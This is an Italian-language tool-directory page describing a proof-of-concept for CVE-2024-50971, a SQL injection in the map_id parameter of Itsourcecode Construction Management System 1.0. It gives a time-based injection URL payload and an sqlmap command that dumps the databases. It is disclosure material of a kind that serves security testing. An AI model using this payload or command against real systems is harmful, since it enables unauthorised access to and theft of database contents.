Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-50971 — Proof-of-concept per una vulnerabilità di SQL injection in Itsourcecode Construction Management System 1.0, con passaggi di sfruttamento e integrazione di SQLMap per l'estrazione del database. | Kitploit
Strumenti/GitHubGitHub/akhlak2511/cve-2024-50971
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza dei Database
GitHubakhlak2511/cve-2024-50971

CVE-2024-50971

Proof-of-concept per una vulnerabilità di SQL injection in Itsourcecode Construction Management System 1.0, con passaggi di sfruttamento e integrazione di SQLMap per l'estrazione del database.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-50971

Descrizione

Una vulnerabilità di SQL injection in print.php di Itsourcecode Construction Management System 1.0 consente a un attaccante remoto di eseguire comandi SQL arbitrari tramite il parametro map_id.

Tipo di vulnerabilità

SQL Injection

Fornitore del prodotto

Itsourcecode

Base del codice prodotto interessato:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

Componente interessato:

Il sistema Itsourcecode Construction Management System v1.0 è vulnerabile a SQL injection tramite il parametro map_id nella pagina print.php.

Vettori di attacco:

  1. Imposta l'applicazione localmente, registra un account e accedi con le credenziali admin:admin
  2. Naviga al seguente URL nel tuo browser: http://localhost/monitoring_system/print.php?map_id=67
  3. Inietta il Payload SQL: Modifica il parametro map_id nell'URL per includere un payload di SQL injection basato sul tempo. http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
  4. Osserva la risposta dell'applicazione: La pagina dovrebbe impiegare notevolmente più tempo (15 secondi) per caricarsi se l'iniezione ha successo, confermando che il parametro map_id è vulnerabile a SQL injection.
  5. Ora usa lo strumento SQLMap per ulteriore sfruttamento e dump dei database usando il comando seguente: sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast

Riferimenti:

  1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
  2. https://owasp.org/www-community/attacks/SQL_Injection
Scarica lo strumento